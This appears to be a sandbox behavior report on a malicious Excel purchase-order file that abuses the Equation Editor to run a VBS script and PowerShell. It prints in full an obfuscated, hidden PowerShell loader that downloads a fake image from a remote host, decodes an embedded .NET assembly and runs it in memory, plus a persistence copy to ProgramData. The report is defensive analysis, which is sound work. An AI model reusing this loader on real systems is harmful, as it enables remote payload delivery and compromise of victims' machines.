Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: xF3wienia PO2102559-1.xlsx ReversingLabs: Detection: 63%
Source: xF3wienia PO2102559-1.xlsx Virustotal: Detection: 53%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
